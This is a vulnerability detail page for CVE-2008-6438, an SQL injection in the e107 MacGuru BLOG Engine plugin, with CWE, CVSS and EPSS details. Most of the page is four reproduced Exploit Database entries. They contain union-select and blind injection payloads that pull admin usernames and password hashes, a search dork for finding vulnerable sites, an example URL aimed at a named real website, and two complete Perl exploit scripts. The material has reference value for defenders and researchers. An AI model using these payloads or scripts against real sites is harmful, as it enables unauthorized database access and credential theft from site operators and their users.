CVE-2008-6438 Detail

CVE-2008-6438

CVE Descriptions

SQL injection vulnerability in macgurublog_menu/macgurublog.php in the MacGuru BLOG Engine plugin 2.2 for e107 allows remote attackers to execute arbitrary SQL commands via the uid parameter, a different vector than CVE-2008-2455. NOTE: it was later reported that 2.1.4 is also affected.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 6856

Publication date : 2008-10-27 23h00 +00:00
Author : ZoRLu
EDB Verified : Yes

e107 Plugin macgurublog_menu macgurublog.php (uid) Remote Sql inj author: ZoRLu home: z0rlu.blogspot.com concat: trt-turk@hotmail.com date: 28/10/2008 n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( n0te: a.q kpss : ) ) dork: allinurl:"macgurublog.php?uid=" exploit: http://localhost/script_path/macgurublog.php?uid=[SQL] [SQL]= -1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/* example: http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/* thanks: str0ke # milw0rm.com [2008-10-28]

Exploit Database EDB-ID : 5666

Publication date : 2008-05-21 22h00 +00:00
Author : Virangar Security
EDB Verified : Yes

################################################################################################## # # # ::e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability:: # # # ################################################################################################## Virangar Security Team www.virangar.net -------- Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) -------vuln codes in:----------- macgurublog.php: line 18:$buid = $_GET['uid']; .. .. line 31:$sql -> db_Select("user", "user_name", "user_id=".$buid); --- exploit: [-]note=becuse e107 using diffrent prefix/table names it's impossible to writting exploit for it :( http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 2>1/* #the page fully loaded http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 1>3/* #page loaded whit any data and some error that say "The user has hidden their blog." cheking the mysql version: http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=5 or http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=4 # you can exploting the bug white blind sql automatic toolz such as sqlmap or ... --- young iranian h4ck3rz # milw0rm.com [2008-05-22]

Exploit Database EDB-ID : 6346

Publication date : 2008-08-31 22h00 +00:00
Author : Virangar Security
EDB Verified : Yes

#!/usr/bin/perl ############################################################## # e107 Plugin BLOG Engine v2.2 SQL Injection Exploit # # ..::virangar security team::.. # # www.virangar.net # # C0d3d BY:virangar security team ( hadihadi ) # #special tnx to: # #MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra # #& all virangar members & all hackerz # # my lovely friends hadi_aryaie2004 & arash(imm02tal) # # ..:::Young Iranina Hackerz::.. # ############################################################## use HTTP::Request; use LWP::UserAgent; if (@ARGV != 1){ header(); } $site = $ARGV[0]; $attack= "$site"."?uid=-99999%20union%20select%201,concat(0x3c757365723e,user_name,0x3c757365723e,user_password),3%20from%20e107_user%20where%20user_ id=1/*"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $req = $b->request(HTTP::Request->new(GET=>$attack)); $res = $req->content; if ($res =~ /<user>(.*?)<user>/){ print "\n[+] Admin User : $1";} if ($res =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Hash : $1\n\n"; print "\n[+]Done\n";} sub header { print qq{ ################################################################### # e107 Plugin BLOG Engine v2.2 SQL Injection Exploit # # www.virangar.net # # Useage: perl $0 Host # # # # Host: full patch to macgurublog.php (dont forget http://) # # # # Example: # # perl $0 http://site/macgurublog_menu/macgurublog.php # # # ################################################################### }; } #virangar.net[2008-05-22] # milw0rm.com [2008-09-01]

Exploit Database EDB-ID : 6158

Publication date : 2008-07-28 22h00 +00:00
Author : Virangar Security
EDB Verified : Yes

#!/usr/bin/perl ##################################################################################### # e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit # # ..::virangar security team::.. # # www.virangar.net # # C0d3d BY:virangar security team ( hadihadi ) # #special tnx to: # #MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra # #& all virangar members & all hackerz # # my lovely friends hadi_aryaie2004 & arash(imm02tal) # # ..:::Young Iranina Hackerz::.. # ##################################################################################### #[-] note: becuse e107 using diffrent prefix/table names may it's not work good,but i wrote it for default mod ;) #this code is for english e107's only,if you want work on other languages,you can edit line 67;) use HTTP::Request; use LWP::UserAgent; if (@ARGV != 1){ header(); } $host = $ARGV[0]; print "\n md5 Password:\r\n"; &halghe(); print "\n[+]Done\n"; sub halghe { for($i = 1; $i <= 32; $i++){ $f = 0; $n = 48; while(!$f && $n <= 57) { if(&inject($host, $i, $n,)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; } if(!$f){ $n=97; while(!$f && $n <= 102) { if(&inject($host, $i, $n,)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; }} } } sub inject { my $site = $_[0]; my $a = $_[1]; my $b = $_[2]; $col = "user_password"; $attack= "$site"."%20and%20substring((select%20"."$col"."%20from%20e107_user%20where%20user_id=1%20limit%200,1),"."$a".",1)=char("."$b".")/*"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $req = $b->request(HTTP::Request->new(GET=>$attack)); $res = $req->content; if ($res !~ /The user has hidden their blog./i){ return 1; } } sub header { print qq{ ################################################################### # e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit # # (just for english e107's) # # www.virangar.net # # Useage: perl $0 Host # # # # Host: full patch to macgurublog.php+uid (dont forget http://) # # # # Example: # # perl $0 http://site/macgurublog_menu/macgurublog.php?uid=5 # # # ################################################################### }; } # milw0rm.com [2008-07-29]